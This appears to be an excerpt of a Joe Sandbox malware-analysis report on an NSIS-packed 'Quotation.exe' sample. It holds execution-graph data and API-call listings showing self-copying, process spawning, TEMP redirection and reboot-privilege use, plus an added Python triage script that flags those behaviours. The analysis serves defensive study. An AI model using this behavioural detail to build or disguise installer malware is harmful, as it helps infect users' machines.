5200->5201 5200->5209 5201->5209 5204 4039f6 CopyFileW 5202->5204 5316 403b19 5203->5316 5204->5203 5204->5209 5205 405c2d 71 API calls 5205->5209 5206 4062e1 40 API calls 5206->5209 5207 40655e 21 API calls 5207->5209 5209->5189 5209->5194 5209->5197 5209->5198 5209->5199 5209->5200 5209->5203 5209->5205 5209->5206 5209->5207 5210 403a6f CloseHandle 5209->5210 5211 40687e 2 API calls 5209->5211 5313 405b04 CreateProcessW 5209->5313 5210->5203 5211->5209 5212->5140 5213->5142 5215 4067cf 5 API calls 5214->5215 5217 4034d7 5215->5217 5216 4034e1 5216->5148 5217->5216 5218 405df0 3 API calls 5217->5218 5219 4034e9 5218->5219 5220 405acf 2 API calls 5219->5220 5221 4034ef 5220->5221 5222 406040 2 API calls 5221->5222 5223 4034fa 
5222->5223 5223->5148 5323 406011 GetFileAttributesW CreateFileW 5224->5323 5226 4030c2 5245 4030d2 5226->5245 5324 406521 lstrcpynW 5226->5324 5228 4030e8 5229 405e3c 2 API calls 5228->5229 5230 4030ee 5229->5230 5325 406521 lstrcpynW 5230->5325 5232 4030f9 GetFileSize 5233 4031f3 5232->5233 5251 403110 5232->5251 5326 40301e 5233->5326 5235 4031fc 5237 40322c GlobalAlloc 5235->5237 5235->5245 5338 4034b4 SetFilePointer 5235->5338 5236 40349e ReadFile 5236->5251 5337 4034b4 SetFilePointer 5237->5337 5240 40325f 5242 40301e 6 API calls 5240->5242 5241 403247 5244 4032b9 39 API calls 5241->5244 5242->5245 5243 403215 5246 40349e ReadFile 5243->5246 5249 403253 5244->5249 5245->5156 5248 403220 5246->5248 5247 40301e 6 API calls 5247->5251 5248->5237 5248->5245 5249->5245 5249->5249 5250 403290 SetFilePointer 5249->5250 5250->5245 5251->5233 5251->5236 5251->5240 5251->5245 5251->5247 5253 406915 5 API calls 5252->5253 5254 403c07 5253->5254 5255 403c0d 5254->5255 5256 403c1f 5254->5256 5351 406468 wsprintfW 5255->5351 5257 4063ef 3 API calls 5256->5257 5258 403c4f 5257->5258 5259 403c6e lstrcatW 5258->5259 5261 4063ef 3 API calls 5258->5261 5262 403c1d 5259->5262 5261->5259 5343 403ec9 5262->5343 5265 405ef8 18 API calls 5266 403ca0 5265->5266 5267 403d34 5266->5267 5269 4063ef 3 API calls 5266->5269 5268 405ef8 18 API calls 5267->5268 5270 403d3a 5268->5270 5271 403cd2 5269->5271 5272 403d4a LoadImageW 5270->5272 5273 40655e 21 API calls 5270->5273 5271->5267 5278 403cf3 lstrlenW 5271->5278 5279 405e1d CharNextW 5271->5279 5274 403df0 5272->5274 5275 403d71 RegisterClassW 5272->5275 5273->5272 5277 40140b 2 API calls 5274->5277 5276 403da7 SystemParametersInfoW CreateWindowExW 5275->5276 5307 403dfa 5275->5307 5276->5274 5282 403df6 5277->5282 5280 403d01 lstrcmpiW 5278->5280 5281 403d27 5278->5281 5283 403cf0 5279->5283 5280->5281 5284 403d11 GetFileAttributesW 5280->5284 5285 405df0 3 API calls 5281->5285 5287 403ec9 22 API calls 5282->5287 5282->5307 5283->5278 
5286 403d1d 5284->5286 5288 403d2d 5285->5288 5286->5281 5289 405e3c 2 API calls 5286->5289 5290 403e07 5287->5290 5352 406521 lstrcpynW 5288->5352 5289->5281 5292 403e13 ShowWindow 5290->5292 5293 403e96 5290->5293 5295 4068a5 3 API calls 5292->5295 5294 405679 5 API calls 5293->5294 5296 403e9c 5294->5296 5297 403e2b 5295->5297 5298 403ea0 5296->5298 5299 403eb8 5296->5299 5300 403e39 GetClassInfoW 5297->5300 5304 4068a5 3 API calls 5297->5304 5306 40140b 2 API calls 5298->5306 5298->5307 5303 40140b 2 API calls 5299->5303 5301 403e63 DialogBoxParamW 5300->5301 5302 403e4d GetClassInfoW RegisterClassW 5300->5302 5305 40140b 2 API calls 5301->5305 5302->5301 5303->5307 5304->5300 5305->5307 5306->5307 5307->5203 5308->5146 5309->5191 5310->5195 5311->5186 5312->5189 5314 405b43 5313->5314 5315 405b37 CloseHandle 5313->5315 5314->5209 5315->5314 5317 403b31 5316->5317 5318 403b23 CloseHandle 5316->5318 5354 403b5e 5317->5354 5318->5317 5321 405c2d 71 API calls 5322 403a4c OleUninitialize 5321->5322 5322->5166 5322->5167 5323->5226 5324->5228 5325->5232 5327 403027 5326->5327 5328 40303f 5326->5328 5329 403030 DestroyWindow 5327->5329 5330 403037 5327->5330 5331 403047 5328->5331 5332 40304f GetTickCount 5328->5332 5329->5330 5330->5235 5339 406951 5331->5339 5334 403080 5332->5334 5335 40305d CreateDialogParamW ShowWindow 5332->5335 5334->5235 5335->5334 5337->5241 5338->5243 5340 40696e PeekMessageW 5339->5340 5341 406964 DispatchMessageW 5340->5341 5342 40304d 5340->5342 5341->5340 5342->5235 5344 403edd 5343->5344 5353 406468 wsprintfW 5344->5353 5346 403f4e 5347 403f82 22 API calls 5346->5347 5349 403f53 5347->5349 5348 403c7e 5348->5265 5349->5348 5350 40655e 21 API calls 5349->5350 5350->5349 5351->5262 5352->5267 5353->5346 5355 403b6c 5354->5355 5356 403b36 5355->5356 5357 403b71 FreeLibrary GlobalFree 5355->5357 5356->5321 5357->5356 5357->5357 5685 401b7c 5686 402dab 21 API calls 5685->5686 5687 401b83 5686->5687 5688 402d89 21 API calls 5687->5688 5689 
401b8c wsprintfW 5688->5689 5690 402c2f 5689->5690 5358 73422a7f 5359 73422acf 5358->5359 5360 73422a8f VirtualProtect 5358->5360 5360->5359 5698 401000 5699 401037 BeginPaint GetClientRect 5698->5699 5701 40100c DefWindowProcW 5698->5701 5702 4010f3 5699->5702 5703 401179 5701->5703 5704 401073 CreateBrushIndirect FillRect DeleteObject 5702->5704 5705 4010fc 5702->5705 5704->5702 5706 401102 CreateFontIndirectW 5705->5706 5707 401167 EndPaint 5705->5707 5706->5707 5708 401112 6 API calls 5706->5708 5707->5703 5708->5707 5709 401680 5710 402dab 21 API calls 5709->5710 5711 401687 5710->5711 5712 402dab 21 API calls 5711->5712 5713 401690 5712->5713 5714 402dab 21 API calls 5713->5714 5715 401699 MoveFileW 5714->5715 5716 4016ac 5715->5716 5722 4016a5 5715->5722 5718 4022fb 5716->5718 5719 40687e 2 API calls 5716->5719 5717 401423 28 API calls 5717->5718 5720 4016bb 5719->5720 5720->5718 5721 4062e1 40 API calls 5720->5721 5721->5722 5722->5717 5723 73421000 5726 7342101b 5723->5726 5727 734215b6 GlobalFree 5726->5727 5728 73421020 5727->5728 5729 73421027 GlobalAlloc 5728->5729 5730 73421024 5728->5730 5729->5730 5731 734215dd 3 API calls 5730->5731 5732 73421019 5731->5732 5733 401503 5734 401508 5733->5734 5735 401520 5733->5735 5736 402d89 21 API calls 5734->5736 5736->5735 4222 402304 4237 402dab 4222->4237 4225 402dab 21 API calls 4226 402313 4225->4226 4227 402dab 21 API calls 4226->4227 4228 40231c 4227->4228 4243 40687e FindFirstFileW 4228->4243 4231 402336 lstrlenW lstrlenW 4234 4055a6 28 API calls 4231->4234 4232 402329 4236 402331 4232->4236 4246 4055a6 4232->4246 4235 402374 SHFileOperationW 4234->4235 4235->4232 4235->4236 4238 402db7 4237->4238 4257 40655e 4238->4257 4241 40230a 4241->4225 4244 406894 FindClose 4243->4244 4245 402325 4243->4245 4244->4245 4245->4231 4245->4232 4247 4055c1 4246->4247 4248 405663 4246->4248 4249 4055dd lstrlenW 4247->4249 4250 40655e 21 API calls 4247->4250 4248->4236 4251 405606 4249->4251 4252 4055eb lstrlenW 
4249->4252 4250->4249 4254 405619 4251->4254 4255 40560c SetWindowTextW 4251->4255 4252->4248 4253 4055fd lstrcatW 4252->4253 4253->4251 4254->4248 4256 40561f SendMessageW SendMessageW SendMessageW 4254->4256 4255->4254 4256->4248 4261 406569 4257->4261 4258 4067b0 4259 402dd8 4258->4259 4296 406521 lstrcpynW 4258->4296 4259->4241 4274 4067cf 4259->4274 4261->4258 4262 406781 lstrlenW 4261->4262 4266 40667a GetSystemDirectoryW 4261->4266 4267 40655e 15 API calls 4261->4267 4268 406690 GetWindowsDirectoryW 4261->4268 4269 4067cf 5 API calls 4261->4269 4270 40655e 15 API calls 4261->4270 4271 406722 lstrcatW 4261->4271 4273 4066f2 SHGetPathFromIDListW CoTaskMemFree 4261->4273 4283 4063ef 4261->4283 4288 406915 GetModuleHandleA 4261->4288 4294 406468 wsprintfW 4261->4294 4295 406521 lstrcpynW 4261->4295 4262->4261 4266->4261 4267->4262 4268->4261 4269->4261 4270->4261 4271->4261 4273->4261 4281 4067dc 4274->4281 4275 406852 4276 406857 CharPrevW 4275->4276 4278 406878 4275->4278 4276->4275 4277 406845 CharNextW 4277->4275 4277->4281 4278->4241 4280 406831 CharNextW 4280->4281 4281->4275 4281->4277 4281->4280 4282 406840 CharNextW 4281->4282 4304 405e1d 4281->4304 4282->4277 4297 40638e 4283->4297 4286 406423 RegQueryValueExW RegCloseKey 4287 406453 4286->4287 4287->4261 4289 406931 4288->4289 4290 40693b GetProcAddress 4288->4290 4301 4068a5 GetSystemDirectoryW 4289->4301 4292 40694a 4290->4292 4292->4261 4293 406937 4293->4290 4293->4292 4294->4261 4295->4261 4296->4259 4298 40639d 4297->4298 4299 4063a1 4298->4299 4300 4063a6 RegOpenKeyExW 4298->4300 4299->4286 4299->4287 4300->4299 4302 4068c7 wsprintfW LoadLibraryExW 4301->4302 4302->4293 4305 405e23 4304->4305 4306 405e39 4305->4306 4307 405e2a CharNextW 4305->4307 4306->4281 4307->4305 5737 401a04 5738 402dab 21 API calls 5737->5738 5739 401a0b 5738->5739 5740 402dab 21 API calls 5739->5740 5741 401a14 5740->5741 5742 401a1b lstrcmpiW 5741->5742 5743 401a2d lstrcmpW 5741->5743 5744 401a21 5742->5744 5743->5744 
5745 401d86 5746 401d99 GetDlgItem 5745->5746 5747 401d8c 5745->5747 5748 401d93 5746->5748 5749 402d89 21 API calls 5747->5749 5750 401dda GetClientRect LoadImageW SendMessageW 5748->5750 5751 402dab 21 API calls 5748->5751 5749->5748 5753 401e38 5750->5753 5755 401e44 5750->5755 5751->5750 5754 401e3d DeleteObject 5753->5754 5753->5755 5754->5755 5756 402388 5757 40238f 5756->5757 5760 4023a2 5756->5760 5758 40655e 21 API calls 5757->5758 5759 40239c 5758->5759 5759->5760 5761 405b81 MessageBoxIndirectW 5759->5761 5761->5760 5762 402c0a SendMessageW 5763 402c24 InvalidateRect 5762->5763 5764 402c2f 5762->5764 5763->5764 5772 404f0d GetDlgItem GetDlgItem 5773 404f5f 7 API calls 5772->5773 5779 405184 5772->5779 5774 405006 DeleteObject 5773->5774 5775 404ff9 SendMessageW 5773->5775 5776 40500f 5774->5776 5775->5774 5777 405046 5776->5777 5780 40655e 21 API calls 5776->5780 5781 4044a0 22 API calls 5777->5781 5778 405266 5782 405312 5778->5782 5787 405177 5778->5787 5792 4052bf SendMessageW 5778->5792 5779->5778 5806 4051f3 5779->5806 5826 404e5b SendMessageW 5779->5826 5785 405028 SendMessageW SendMessageW 5780->5785 5786 40505a 5781->5786 5783 405324 5782->5783 5784 40531c SendMessageW 5782->5784 5794 405336 ImageList_Destroy 5783->5794 5795 40533d 5783->5795 5803 40534d 5783->5803 5784->5783 5785->5776 5791 4044a0 22 API calls 5786->5791 5789 404507 8 API calls 5787->5789 5788 405258 SendMessageW 5788->5778 5793 405513 5789->5793 5807 40506b 5791->5807 5792->5787 5797 4052d4 SendMessageW 5792->5797 5794->5795 5798 405346 GlobalFree 5795->5798 5795->5803 5796 4054c7 5796->5787 5801 4054d9 ShowWindow GetDlgItem ShowWindow 5796->5801 5800 4052e7 5797->5800 5798->5803 5799 405146 GetWindowLongW SetWindowLongW 5802 40515f 5799->5802 5812 4052f8 SendMessageW 5800->5812 5801->5787 5804 405164 ShowWindow 5802->5804 5805 40517c 5802->5805 5803->5796 5819 405388 5803->5819 5831 404edb 5803->5831 5824 4044d5 SendMessageW 5804->5824 5825 4044d5 SendMessageW 5805->5825 
Execution graph data (continued): basic-block addresses and edges for the sample's main image at 0x400000 (blocks 00401389-00406C3F, reaching Registry, file, dialog and window, shell (SHBrowseForFolderW, ShellExecuteExW, CoCreateInstance), process-wait and string APIs, with "N API calls" summaries for their callees) and for a module at 7342103D-7342176B (GlobalFree, VirtualFree). Node and edge lists omitted.

Control-flow Graph: function 004034FC-00403B13 (basic-block and edge data, with executed/not-executed marking, omitted; the APIs reached from these blocks are listed below)
                                                              APIs
                                                              • SetErrorMode.KERNELBASE ref: 0040351F
                                                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040354A
                                                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040355D
                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 004035F6
                                                              • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403633
                                                              • OleInitialize.OLE32(00000000), ref: 0040363A
                                                              • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403659
                                                              • GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040366E
                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Quotation.exe",00000020,"C:\Users\user\Desktop\Quotation.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036A7
                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037DF
                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037F0
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FC
                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403818
                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403829
                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403831
                                                              • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403845
                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Quotation.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040391E
                                                                • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                              • wsprintfW.USER32 ref: 0040397B
                                                              • GetFileAttributesW.KERNEL32(1056,C:\Users\user\AppData\Local\Temp\), ref: 004039AE
                                                              • DeleteFileW.KERNEL32(1056), ref: 004039BA
                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004039E8
                                                                • Part of subcall function 004062E1: MoveFileExW.KERNEL32(?,?,00000005,00405DDF,?,00000000,000000F1,?,?,?,?,?), ref: 004062EB
                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\Quotation.exe,1056,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004039FE
                                                                • Part of subcall function 00405B04: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,1056,?), ref: 00405B2D
                                                                • Part of subcall function 00405B04: CloseHandle.KERNEL32(?,?,?,1056,?), ref: 00405B3A
                                                                • Part of subcall function 0040687E: FindFirstFileW.KERNELBASE(75923420,00425F58,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                • Part of subcall function 0040687E: FindClose.KERNEL32(00000000), ref: 00406895
                                                              • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A4C
                                                              • ExitProcess.KERNEL32 ref: 00403A69
                                                              • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,1056,00000000), ref: 00403A70
                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A8C
                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403A93
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403ACB
                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
                                                              • ExitProcess.KERNEL32 ref: 00403B13
                                                                • Part of subcall function 00405ACF: CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                              • String ID: "C:\Users\user\Desktop\Quotation.exe"$1033$1056$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Quotation.exe$C:\Users\user\ethnocentrism\skggene\Egyptians218$C:\Users\user\ethnocentrism\skggene\Egyptians218$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                              • API String ID: 1813718867-1410604708
                                                              • Opcode ID: 861c3a791dac713e5dc6c418a8dec487fa289242a5d5f99aa186722fda572ff2
                                                              • Instruction ID: bee44f309595f2ff458e9cecae568de25c9667724a66d0f49069eb89ae1a0629
                                                              • Opcode Fuzzy Hash: 861c3a791dac713e5dc6c418a8dec487fa289242a5d5f99aa186722fda572ff2
                                                              • Instruction Fuzzy Hash: FDF10170204301ABD720AF659D05B2B3EE8EB8570AF11483EF581B62D1DB7DCA45CB6E
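Added example, not part of the Joe Sandbox report or of NSIS: a small Python parser for the "APIs" bullet lines of the function entry above, followed by three triage checks a reviewer of an NSIS-packed sample wants answered from that listing (does the stub copy its own image and spawn a process from it, does it redirect TEMP/TMP before dropping anything, and does it acquire SeShutdownPrivilege and call ExitWindowsEx). The line format is inferred from this report; the embedded sample input is a subset of the listing for 004034FC above and the sample path is the one the report shows. The rule names and the flag dictionary are this example's own.

```python
"""Parse the 'APIs' bullet lines of a Joe Sandbox function entry into a call
list and run a few triage checks for an installer-stub sample.

Added example, not part of the Joe Sandbox report or of NSIS.  The line
format is inferred from the listing for function 004034FC above; the sample
text below is a subset of those lines, embedded so the script runs offline.
"""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import List, Optional

# One bullet of the "APIs" section.  The "Part of subcall function" prefix,
# the parenthesised argument list and the comma before "ref:" are all
# optional in this report (compare "wsprintfW.USER32 ref: 0040397B").
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[#\w]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int                          # address of the call site
    args: List[str] = field(default_factory=list)
    subcall_of: Optional[int] = None  # callee address when the call is indirect


def parse_api_lines(text: str) -> List[ApiCall]:
    """Return the calls in report order; lines that are not API bullets are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("module"),
                             int(m.group("ref"), 16), args,
                             int(sub, 16) if sub else None))
    return calls


def modules_used(calls: List[ApiCall]) -> Counter:
    """How many call sites go to each module (KERNEL32, USER32, ADVAPI32, ...)."""
    return Counter(c.module for c in calls)


def triage(calls: List[ApiCall], sample_path: str) -> dict:
    """Three checks on the call list; rule names are this example's own."""
    names = {c.api for c in calls}
    # 1. The stub copies its own image elsewhere and then spawns a process.
    #    NSIS does this for its uninstaller (~nsuXXXX.tmp), so by itself this
    #    is packer behaviour, but it tells you which image the child runs from.
    self_copy = any(c.api == "CopyFileW" and c.args and c.args[0] == sample_path
                    for c in calls)
    # 2. TEMP/TMP are rewritten before anything is dropped, so later paths
    #    must be read relative to the stub's choice, not the system default.
    env_targets = [c.args[0] for c in calls
                   if c.api == "SetEnvironmentVariableW" and c.args]
    # 3. SeShutdownPrivilege plus ExitWindowsEx: the stub can reboot the host.
    asks_shutdown = any(c.api == "LookupPrivilegeValueW"
                        and "SeShutdownPrivilege" in c.args for c in calls)
    return {
        "self_copy_then_spawn": self_copy and "CreateProcessW" in names,
        "temp_env_override": any(v in ("TEMP", "TMP") for v in env_targets),
        "can_reboot": asks_shutdown and "ExitWindowsEx" in names,
    }


# Subset of the APIs listing for 004034FC above, embedded as sample input.
SAMPLE_PATH = r"C:\Users\user\Desktop\Quotation.exe"
SAMPLE = r"""
• SetErrorMode.KERNELBASE ref: 0040351F
• GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040354A
• GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040366E
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403829
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403831
• wsprintfW.USER32 ref: 0040397B
• CopyFileW.KERNEL32(C:\Users\user\Desktop\Quotation.exe,1056,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004039FE
  • Part of subcall function 00405B04: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,1056,?), ref: 00405B2D
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
• ExitProcess.KERNEL32 ref: 00403B13
"""

if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for c in parsed:
        where = f" (via {c.subcall_of:08X})" if c.subcall_of else ""
        print(f"{c.ref:08X} {c.module:<10} {c.api}{where}")
    print(modules_used(parsed))
    print(triage(parsed, SAMPLE_PATH))
```

The parser keeps report order rather than sorting by address, because the bullets above are listed in control-flow position (note GetDlgItem at 00405761 appearing after 00405888 in the next function's listing), which is the order an analyst wants to read. All three flags being true is expected for an NSIS stub; the value of the checks is in reading the flagged arguments (the copy destination and the TEMP path) against the drop paths elsewhere in the report, not in the flags alone.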

Control-flow Graph: function 004056E5-00405A70 (basic-block and edge data, with executed/not-executed marking, omitted; the APIs reached from these blocks are listed below)
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000403), ref: 00405743
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00405752
                                                              • GetClientRect.USER32(?,?), ref: 0040578F
                                                              • GetSystemMetrics.USER32(00000002), ref: 00405796
                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B7
                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C8
                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057DB
                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E9
                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FC
                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581E
                                                              • ShowWindow.USER32(?,00000008), ref: 00405832
                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405853
                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405863
                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587C
                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405888
                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405761
                                                                • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,?,00404300), ref: 004044E3
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004058A5
                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005679,00000000), ref: 004058B3
                                                              • CloseHandle.KERNELBASE(00000000), ref: 004058BA
                                                              • ShowWindow.USER32(00000000), ref: 004058DE
                                                              • ShowWindow.USER32(?,00000008), ref: 004058E3
                                                              • ShowWindow.USER32(00000008), ref: 0040592D
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405961
                                                              • CreatePopupMenu.USER32 ref: 00405972
                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405986
                                                              • GetWindowRect.USER32(?,?), ref: 004059A6
                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BF
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F7
                                                              • OpenClipboard.USER32(00000000), ref: 00405A07
                                                              • EmptyClipboard.USER32 ref: 00405A0D
                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A19
                                                              • GlobalLock.KERNEL32(00000000), ref: 00405A23
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A37
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405A57
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405A62
                                                              • CloseClipboard.USER32 ref: 00405A68
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                              • String ID: {$X
                                                              • API String ID: 590372296-1797619585
                                                              • Opcode ID: bcd6524ca319c6da9779c5e50c73cceb5f6d9afdf0ecbcca2ead9855fe138ddf
                                                              • Instruction ID: bfdbfabbc3eccdd340dcac883e36f8678c6b127a6a9b52dc92d7db9eae4071ee
